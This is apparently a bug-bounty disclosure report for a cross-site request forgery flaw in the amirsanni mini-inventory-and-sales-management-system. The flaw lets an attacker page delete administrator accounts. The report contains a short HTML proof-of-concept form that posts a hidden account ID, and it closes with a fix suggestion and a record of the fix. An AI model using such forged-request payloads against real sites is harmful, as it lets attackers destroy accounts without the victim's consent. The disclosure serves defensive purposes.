Cross-Site Request Forgery (CSRF) in amirsanni/mini-inventory-and-sales-management-system


Reported on

Sep 7th 2021

✍️ Description

Attacker is able to delete a administrator accounts if a logged in user visits attacker website.

🕵️‍♂️ Proof of Concept

1.when you logged in open this POC.html in a browser(Firefox and Safari) can check unintentionally you delete an administrator account.

 <script>history.pushState('', '', '/')</script>
   <form action="" method="POST">
     <input type="hidden" name="_aId" value="396" />
     <input type="submit" value="Submit request" />

💥 Impact

This vulnerability is capable of forging admin to unintentional delete an account.

💥 Test

Tested on Firefox and safari.

💥 Fix

You should set a CSRF token on this requests.


We have contacted a member of the amirsanni/mini-inventory-and-sales-management-system team and are waiting to hear back 2 years ago
2 years ago


hi are you checked this report?

Amir validated this vulnerability a year ago
Musio has been awarded the disclosure bounty
The fix bounty is now up for grabs
Amir marked this as fixed with commit ba36f6 a year ago
Amir has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation